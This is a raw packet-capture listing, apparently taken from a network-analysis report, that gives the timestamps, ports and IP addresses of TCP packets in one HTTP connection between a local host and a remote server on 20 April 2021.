Apr 20, 2021 22:59:12.482911110 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.482923985 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.482949972 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.482974052 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.483782053 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.483803988 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.483828068 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.483841896 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.483875990 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.484282970 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.484306097 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.484328032 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.484348059 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.484360933 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.484370947 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.484392881 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.484395981 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.484432936 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.485188961 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.485232115 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.485255003 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.485276937 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.485277891 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.485297918 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.485316038 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.485321045 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.485374928 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.486115932 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.486140013 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.486162901 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.486183882 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.486208916 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.486213923 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.486232996 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.486259937 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.486289024 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.487056971 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.487082005 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.487104893 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.487126112 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.487145901 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.487159014 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.487169027 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.487190008 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.487226009 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.487986088 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.488008976 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.488029957 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.488050938 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.488073111 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.488094091 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.488094091 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.488132954 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.488162041 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.488913059 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.488936901 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.488960981 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.488981009 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.489002943 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.489010096 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.489027023 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.489048958 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.489083052 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.489811897 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.489835024 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.489857912 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.489881039 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.489902973 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.489912987 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.489924908 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.489948988 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.489983082 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.490720987 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.490742922 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.490763903 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.490783930 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.490807056 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.490822077 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.490829945 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.490863085 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.490891933 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.491632938 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.491657972 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.491679907 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.491703033 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.491724968 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.491736889 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.491744995 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.491782904 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.491805077 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.492537022 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.492559910 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.492583036 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.492604017 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.492626905 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.492639065 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.492649078 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.492677927 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.492708921 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.493458986 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.493483067 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.493504047 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.493525982 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.493546963 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.493563890 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.493566990 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.493612051 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.494342089 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.494400978 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.494429111 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.494451046 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.494457006 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.494487047 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.494501114 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.494513988 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.494561911 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.495742083 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.495776892 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.495805979 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.495832920 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.495846987 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.495858908 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.495887995 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.495887995 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.495929956 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.496053934 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.496084929 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.496110916 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.496131897 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.496140957 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.496170998 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.496191025 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.496198893 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.496243954 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.496903896 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.496934891 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.496962070 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.496987104 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.496994019 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.497025013 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.497040033 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.497052908 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.497098923 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.497736931 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.497766018 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.497792959 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.497817039 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.497819901 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.497848034 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.497869968 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.497876883 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.497930050 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.498599052 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.498632908 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.498667955 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.498687029 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.498697996 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.498728991 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.498739958 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.498759985 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.498799086 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.499419928 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.499459028 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.499490023 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.499510050 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.499520063 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.499552011 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.499562025 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.499583006 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.499627113 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.500303984 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.500350952 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.500392914 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.500416994 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.500431061 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
Apr 20, 2021 22:59:12.500475883 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
Apr 20, 2021 22:59:12.500483990 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
                                                                Apr 20, 2021 22:59:12.500533104 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.500576973 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.500577927 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.501255989 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.501297951 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.501326084 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.501327991 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.501359940 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.501370907 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.501415968 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.501449108 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.501461983 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.501478910 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.501534939 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.502192020 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.502218962 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.502240896 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.502260923 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.502280951 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.502290964 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.502301931 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.502322912 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.502342939 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.502393007 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.503938913 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.503958941 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.503979921 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.504034996 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.504040003 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.504060030 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.504061937 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.504101038 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.504110098 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.504120111 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.504138947 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.504156113 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.504177094 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.504179955 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.504195929 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.504211903 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.504226923 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.504229069 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.504244089 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.504255056 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.504288912 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.504960060 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.504981995 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.505002975 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.505022049 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.505031109 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.505040884 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.505055904 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.505069017 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.505080938 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.505125046 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.506436110 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.506896973 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.506994963 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.507217884 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.507239103 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.507256031 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.507276058 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.507294893 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.507312059 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.507313967 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.507329941 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.507347107 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.507356882 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.507363081 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.507381916 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.507397890 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.507399082 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.507420063 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.507428885 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.507482052 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.507652998 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.507672071 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.507689953 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.507707119 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.507724047 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.507740021 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.507745028 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.507797956 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.508342028 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.508394003 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.508413076 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.508430958 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.508440018 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.508449078 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.508466959 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.508476019 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.508483887 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.508516073 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.509306908 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.509330034 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.509347916 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.509366035 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.509366035 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.509397030 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.509398937 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.509421110 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.509438038 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.509463072 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.509500027 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.510129929 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.510160923 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.510184050 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.510212898 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.510222912 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.510237932 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.510247946 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.510262966 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.510288954 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.510313034 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.510965109 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.510996103 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.511018991 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.511030912 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.511043072 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.511070013 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.511070967 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.511095047 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.511117935 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.511140108 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.511142969 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.511183977 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.511946917 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.511979103 CEST8049702172.67.220.147192.168.2.7
